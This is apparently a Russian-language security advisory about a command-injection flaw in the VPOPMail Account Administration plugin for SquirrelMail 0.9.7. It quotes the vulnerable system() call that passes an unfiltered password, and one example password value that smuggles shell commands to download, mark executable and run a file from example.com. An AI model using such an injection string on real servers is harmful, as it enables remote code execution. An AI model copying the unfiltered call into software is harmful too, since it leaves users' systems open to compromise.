| Дата публикации: | 18.03.2003 |
| Всего просмотров: | 1067 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | VPOPMail Account Administration 0.x |
| Описание: | Уязвимость в проверке правильности ввода обнаружена в плагине 'VPOPMail Account Administration' для SquirrelMail и vpopmail. Удаленный пользователь может выполнять произвольные команды на системе.
Программа не фильтрует пароль пользователя в сценарии 'vpopmail.php', перед его принятием в запросе system():
system("$vpasswd $username $pwd");
В результате удаленный пользователь может представить специально обработанное значение для пароля, которое содержит команды оболочки, которые будут выполнены на целевом сервере. Пример:
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;Команды будут выполнены с привилегиями процесса 'vpopmail'. Уязвимость обнаружена в VPOPMail Account Administration (squirrel mail) 0.9.7 |
| Ссылки: | VPOPMail Account Administration (squirrel mail) version 0.9.7 |